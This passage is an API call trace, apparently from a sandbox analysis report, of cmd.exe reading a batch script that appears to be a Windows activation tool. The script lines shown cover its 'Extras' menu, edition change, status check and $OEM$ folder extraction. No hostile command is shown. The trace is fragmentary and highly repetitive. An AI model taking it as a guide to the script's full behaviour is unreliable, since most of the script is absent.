lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2d1d [0181.197] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.197] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11556, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2d24 [0181.197] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n ______________________________________________________________\r\n") returned 7 [0181.197] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.197] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2d24 [0181.197] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.197] GetFileType (hFile=0x9c) returned 0x1 [0181.197] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2d24 [0181.197] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.197] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11655, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2d87 [0181.197] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :_color2 %_White% \" \" %_Green% \"Enter a menu option in the Keyboard [1,2,3,4,0] :\"\r\n", cbMultiByte=99, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="call :_color2 %_White% \" \" %_Green% \"Enter a menu option in the Keyboard [1,2,3,4,0] :\"\r\n=======================================\r\n") returned 99 [0181.197] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.197] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2d87 [0181.197] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.197] GetFileType (hFile=0x9c) returned 0x1 [0181.197] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2d87 [0181.198] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.198] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11675, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2d9b [0181.198] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="choice /C:12340 /N\r\n", cbMultiByte=20, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="choice /C:12340 /N\r\ne% \" \" %_Green% \"Enter a menu option in the Keyboard [1,2,3,4,0] :\"\r\n") returned 20 [0181.198] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.198] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2d9b [0181.198] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.198] GetFileType (hFile=0x9c) returned 0x1 [0181.198] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2d9b [0181.198] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.198] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11698, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2db2 [0181.198] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _erl=%errorlevel%\r\n", cbMultiByte=23, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set _erl=%errorlevel%\r\n\" \" %_Green% \"Enter a menu option in the Keyboard [1,2,3,4,0] :\"\r\n") returned 23 [0181.198] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.198] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2db2 [0181.198] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.198] GetFileType (hFile=0x9c) returned 0x1 [0181.198] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2db2 [0181.198] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.198] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11700, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2db4 [0181.198] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nt _erl=%errorlevel%\r\n") returned 2 [0181.198] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.198] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2db4 [0181.198] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.198] GetFileType (hFile=0x9c) returned 0x1 [0181.198] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2db4 [0181.199] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.199] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11729, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2dd1 [0181.199] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==5 goto :MainMenu\r\n", cbMultiByte=29, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==5 goto :MainMenu\r\n \" %_Green% \"Enter a menu option in the Keyboard [1,2,3,4,0] :\"\r\n") returned 29 [0181.199] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.199] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2dd1 [0181.199] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.199] GetFileType (hFile=0x9c) returned 0x1 [0181.199] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2dd1 [0181.199] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.199] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11801, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e19 [0181.199] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==4 start %mas%genuine-installation-media.html & goto :Extras\r\n", cbMultiByte=72, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==4 start %mas%genuine-installation-media.html & goto :Extras\r\ne Keyboard [1,2,3,4,0] :\"\r\n") returned 72 [0181.199] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.199] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e19 [0181.199] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.199] GetFileType (hFile=0x9c) returned 0x1 [0181.199] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e19 [0181.199] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.199] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11882, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e6a [0181.199] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==3 setlocal & call :_Check_Status_vbs & cls & endlocal & goto :Extras\r\n", cbMultiByte=81, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==3 setlocal & call :_Check_Status_vbs & cls & endlocal & goto :Extras\r\nd [1,2,3,4,0] :\"\r\n") returned 81 [0181.199] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.199] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e6a [0181.199] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.200] GetFileType (hFile=0x9c) returned 0x1 [0181.200] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e6a [0181.200] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.200] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11914, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2e8a [0181.200] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==2 goto:Extract$OEM$\r\n", cbMultiByte=32, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==2 goto:Extract$OEM$\r\nheck_Status_vbs & cls & endlocal & goto :Extras\r\n") returned 32 [0181.200] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.200] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e8a [0181.200] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.200] GetFileType (hFile=0x9c) returned 0x1 [0181.200] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2e8a [0181.200] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.200] SetFilePointer (in: hFile=0x9c, lDistanceToMove=11995, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2edb [0181.200] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_erl%==1 setlocal & call :change_edition & cls & endlocal & goto :Extras\r\n", cbMultiByte=81, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_erl%==1 setlocal & call :change_edition & cls & endlocal & goto :Extras\r\n") returned 81 [0181.200] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.200] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2edb [0181.200] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.200] GetFileType (hFile=0x9c) returned 0x1 [0181.200] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2edb [0181.200] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.200] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12009, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2ee9 [0181.200] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto :Extras\r\n", cbMultiByte=14, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="goto :Extras\r\netlocal & call :change_edition & cls & endlocal & goto :Extras\r\n") returned 14 [0181.200] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.201] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ee9 [0181.201] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.201] GetFileType (hFile=0x9c) returned 0x1 [0181.201] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2ee9 [0181.201] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.201] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12011, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2eeb [0181.201] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nto :Extras\r\n") returned 2 [0181.201] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.201] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2eeb [0181.201] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.201] GetFileType (hFile=0x9c) returned 0x1 [0181.201] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2eeb [0181.201] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.201] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12151, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f77 [0181.201] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0181.201] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.201] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.201] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f77 [0181.201] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.201] GetFileType (hFile=0x9c) returned 0x1 [0181.201] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f77 [0181.201] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.201] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12153, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f79 [0181.202] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0181.202] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.202] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f79 [0181.202] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.202] GetFileType (hFile=0x9c) returned 0x1 [0181.202] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f79 [0181.202] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.202] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12168, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f88 [0181.202] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":Extract$OEM$\r\n", cbMultiByte=15, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":Extract$OEM$\r\n===========================================================================================================================\r\n") returned 15 [0181.202] _wcsicmp (_String1="_color2", _String2="Extract$OEM$") returned -6 [0181.202] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.202] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f88 [0181.202] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.202] GetFileType (hFile=0x9c) returned 0x1 [0181.202] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f88 [0181.202] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.202] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12170, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f8a [0181.202] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nxtract$OEM$\r\n") returned 2 [0181.202] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.202] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f8a [0181.202] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.202] GetFileType (hFile=0x9c) returned 0x1 [0181.202] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f8a [0181.203] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.203] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12175, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f8f [0181.203] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="cls\r\n", cbMultiByte=5, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="cls\r\nact$OEM$\r\n") returned 5 [0181.203] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.203] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f8f [0181.203] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.203] GetFileType (hFile=0x9c) returned 0x1 [0181.203] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f8f [0181.203] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.203] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12204, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2fac [0181.203] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="title Extract $OEM$ Folder\r\n", cbMultiByte=29, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="title Extract $OEM$ Folder\r\n=============================================================================================================\r\n") returned 29 [0181.203] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.203] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2fac [0181.203] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.203] GetFileType (hFile=0x9c) returned 0x1 [0181.203] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2fac [0181.203] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.203] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12217, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2fb9 [0181.203] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="mode 76, 30\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="mode 76, 30\r\nt $OEM$ Folder\r\n") returned 13 [0181.203] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.203] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2fb9 [0181.204] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.204] GetFileType (hFile=0x9c) returned 0x1 [0181.204] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2fb9 [0181.204] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.204] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12219, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2fbb [0181.204] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nde 76, 30\r\n") returned 2 [0181.204] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.204] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2fbb [0181.204] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.204] GetFileType (hFile=0x9c) returned 0x1 [0181.204] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2fbb [0181.204] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.204] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12250, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2fda [0181.204] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if not exist \"!_desktop_!\\\" (\r\n", cbMultiByte=31, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if not exist \"!_desktop_!\\\" (\r\n===========================================================================================================\r\n") returned 31 [0181.204] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.204] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2fda [0181.204] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.204] GetFileType (hFile=0x9c) returned 0x1 [0181.204] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2fda [0181.204] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, 